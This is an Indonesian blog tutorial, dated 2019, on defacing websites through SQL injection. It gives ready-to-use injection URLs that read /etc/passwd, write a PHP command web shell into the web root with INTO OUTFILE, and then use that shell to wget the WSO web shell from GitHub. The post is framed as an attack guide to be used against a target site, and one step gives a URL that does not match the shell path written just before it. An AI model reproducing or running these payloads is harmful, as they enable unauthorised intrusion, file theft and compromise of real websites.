Rabu, 20 Februari 2019

Cara deface POC SQL into out file(upload shell)

SQL Into Out File
     Halo guys,kali ini saya akan berbagi tutorial SQL Into 
1. Pertama kalian lakukan inject website seperti biasa dengan order by untuk menggetahui jumlah kolom, Dan cari angka cantik dengan union select.

2. Setelah itu cek /etc/passwd di nomor cantiknya, Begini caranya : http://www.sitetarget.com/mod.php?view=161%27+and+false+union+select+1,load_file(0x2f6574632f706173737764),3--+ .

3. Lalu kalian cari saja mana kira-kira direktori yang bisa kalian tanam command.

4. Cara ke 4 kalian perlu menanamkan command, Begini caranya : http://www.sitetarget.com/mod.php?view=161%27+and+false+union+select+1,'<?php system($_GET[cmd]);?>',3+into outfile "/var/www/shell.php"--+ .

5. Nah kalo udah kalian tinggal buka commandnya di http://www.memek.com/babi.php

6. Terakhir tinggal kalian wget shell melalui command tersebut, Begini caranya : http://www.sitetarget.com/shell.php?cmd=wget https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php.

7. Nah terakhir tinggal buka deh akses shellnya.